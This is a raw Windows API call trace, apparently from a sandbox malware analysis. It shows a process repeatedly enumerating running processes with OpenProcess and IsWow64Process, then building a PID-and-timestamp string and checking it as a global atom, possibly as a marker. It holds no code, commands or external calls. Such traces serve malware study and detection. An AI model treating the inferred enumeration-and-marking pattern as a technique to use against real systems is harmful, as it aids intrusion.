	[0107.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.044] CloseHandle (hObject=0x694) returned 1
	[0107.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.044] CloseHandle (hObject=0x694) returned 1
	[0107.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.044] CloseHandle (hObject=0x694) returned 1
	[0107.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.045] CloseHandle (hObject=0x694) returned 1
	[0107.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.045] CloseHandle (hObject=0x694) returned 1
	[0107.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.045] CloseHandle (hObject=0x694) returned 1
	[0107.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.045] CloseHandle (hObject=0x694) returned 1
	[0107.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.045] CloseHandle (hObject=0x694) returned 1
	[0107.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.046] CloseHandle (hObject=0x694) returned 1
	[0107.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.046] CloseHandle (hObject=0x694) returned 1
	[0107.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.046] CloseHandle (hObject=0x694) returned 1
	[0107.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.046] CloseHandle (hObject=0x694) returned 1
	[0107.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.047] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.047] CloseHandle (hObject=0x694) returned 1
	[0107.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.047] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.047] CloseHandle (hObject=0x694) returned 1
	[0107.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.047] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.047] CloseHandle (hObject=0x694) returned 1
	[0107.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.047] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.047] CloseHandle (hObject=0x694) returned 1
	[0107.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.047] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.047] CloseHandle (hObject=0x694) returned 1
	[0107.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.048] CloseHandle (hObject=0x694) returned 1
	[0107.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.048] CloseHandle (hObject=0x694) returned 1
	[0107.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.048] CloseHandle (hObject=0x694) returned 1
	[0107.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.048] CloseHandle (hObject=0x694) returned 1
	[0107.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.048] CloseHandle (hObject=0x694) returned 1
	[0107.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.049] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.049] CloseHandle (hObject=0x694) returned 1
	[0107.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.049] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.049] CloseHandle (hObject=0x694) returned 1
	[0107.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.049] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.049] CloseHandle (hObject=0x694) returned 1
	[0107.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.049] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.049] CloseHandle (hObject=0x694) returned 1
	[0107.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.049] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.050] CloseHandle (hObject=0x694) returned 1
	[0107.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.050] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.050] CloseHandle (hObject=0x694) returned 1
	[0107.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.050] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.050] CloseHandle (hObject=0x694) returned 1
	[0107.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.050] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.050] CloseHandle (hObject=0x694) returned 1
	[0107.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.050] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.050] CloseHandle (hObject=0x694) returned 1
	[0107.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.051] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.051] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.051] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.051] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.051] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.052] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.052] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.052] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.052] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.052] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.052] CloseHandle (hObject=0x694) returned 1
	[0107.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.052] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.052] CloseHandle (hObject=0x694) returned 1
	[0107.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.053] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.053] CloseHandle (hObject=0x694) returned 1
	[0107.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.053] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.053] CloseHandle (hObject=0x694) returned 1
	[0107.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.091] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.091] CloseHandle (hObject=0x694) returned 1
	[0107.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.091] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.091] CloseHandle (hObject=0x694) returned 1
	[0107.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.092] CloseHandle (hObject=0x694) returned 1
	[0107.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.092] CloseHandle (hObject=0x694) returned 1
	[0107.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.092] CloseHandle (hObject=0x694) returned 1
	[0107.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.092] CloseHandle (hObject=0x694) returned 1
	[0107.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.092] CloseHandle (hObject=0x694) returned 1
	[0107.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.093] CloseHandle (hObject=0x694) returned 1
	[0107.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.093] CloseHandle (hObject=0x694) returned 1
	[0107.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.093] CloseHandle (hObject=0x694) returned 1
	[0107.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.093] CloseHandle (hObject=0x694) returned 1
	[0107.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.101] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.101] CloseHandle (hObject=0x694) returned 1
	[0107.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.101] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.101] CloseHandle (hObject=0x694) returned 1
	[0107.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.101] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.101] CloseHandle (hObject=0x694) returned 1
	[0107.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.101] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.101] CloseHandle (hObject=0x694) returned 1
	[0107.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.102] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.102] CloseHandle (hObject=0x694) returned 1
	[0107.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.102] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.102] CloseHandle (hObject=0x694) returned 1
	[0107.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.102] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.102] CloseHandle (hObject=0x694) returned 1
	[0107.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.102] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.102] CloseHandle (hObject=0x694) returned 1
	[0107.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.102] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.102] CloseHandle (hObject=0x694) returned 1
	[0107.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.103] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.103] CloseHandle (hObject=0x694) returned 1
	[0107.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.103] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.103] CloseHandle (hObject=0x694) returned 1
	[0107.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.103] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.103] CloseHandle (hObject=0x694) returned 1
	[0107.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.103] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.103] CloseHandle (hObject=0x694) returned 1
	[0107.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.103] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.103] CloseHandle (hObject=0x694) returned 1
	[0107.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.104] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.104] CloseHandle (hObject=0x694) returned 1
	[0107.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.104] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.104] CloseHandle (hObject=0x694) returned 1
	[0107.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.104] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.104] CloseHandle (hObject=0x694) returned 1
	[0107.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.104] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.104] CloseHandle (hObject=0x694) returned 1
	[0107.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.104] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.104] CloseHandle (hObject=0x694) returned 1
	[0107.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.105] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.105] CloseHandle (hObject=0x694) returned 1
	[0107.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.105] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.105] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.105] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.106] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.106] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.106] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.106] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.106] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.106] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.106] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.107] CloseHandle (hObject=0x694) returned 1
	[0107.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.107] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.107] CloseHandle (hObject=0x694) returned 1
	[0107.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.107] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.107] CloseHandle (hObject=0x694) returned 1
	[0107.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.107] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.107] CloseHandle (hObject=0x694) returned 1
	[0107.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.155] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
